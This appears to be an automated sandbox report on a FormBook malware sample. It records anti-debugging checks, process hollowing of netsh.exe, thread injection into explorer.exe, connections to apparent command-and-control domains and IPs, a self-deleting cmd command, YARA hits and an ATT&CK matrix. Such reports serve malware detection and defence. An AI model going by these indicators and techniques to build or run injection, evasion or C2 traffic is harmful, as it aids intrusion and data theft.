          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03882073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03808EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03881608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03878DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0384A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03803D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.252.22.166 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.94.210.101 80
          Source: C:\Windows\explorer.exeDomain query: www.dragonmodz.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
          Source: C:\Windows\explorer.exeDomain query: www.qzttb.net
          Source: C:\Windows\explorer.exeDomain query: www.royaldears.com
          Source: C:\Windows\explorer.exeDomain query: www.pittsburghdata.center
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9E0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: explorer.exe, 00000005.00000000.362125482.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.367609334.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404234223.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.381883157.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396756364.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.358182276.00000000008B8000.00000004.00000020.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
